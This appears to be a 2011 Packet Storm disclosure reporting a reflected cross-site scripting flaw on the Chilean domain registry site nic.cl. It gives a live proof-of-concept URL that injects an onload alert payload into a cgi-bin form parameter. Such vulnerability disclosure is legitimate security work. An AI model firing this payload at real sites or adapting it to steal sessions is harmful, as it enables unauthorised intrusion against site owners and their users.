Nic.cl Cross Site Scripting

2011-04-21T00:00:00
ID PACKETSTORM:100648
Type packetstorm
Reporter Zerial
Modified 2011-04-21T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
* Main URI: http://www.nic.cl  
  
* Type: Cross Site Scripting  
  
* Exploitable URI:  
http://www.nic.cl/cgi-bin/show-form?f=/example/201001191941%3Cbody%20onload=alert%28this%29%3E3a6  
  
* Status: *Reported*  
  
* Date: April 20, 2011, 12:27 p.m.  
  
Reported on: http://www.secureless.org/vulnerability/1347/  
  
  
  
  
- --   
Zerial  
Seguridad Informatica  
GNU/Linux User #382319  
Blog: http://blog.zerial.org  
Jabber: zerial@jabberes.org  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAk2u/XQACgkQIP17Kywx9JTzjQCeNIbJsr/6fZ1Pr2mO8u7Jb3jA  
TmsAoIdn2ceeo9iO4iC8MmwWO/6tUfRk  
=sCbb  
-----END PGP SIGNATURE-----  
  
`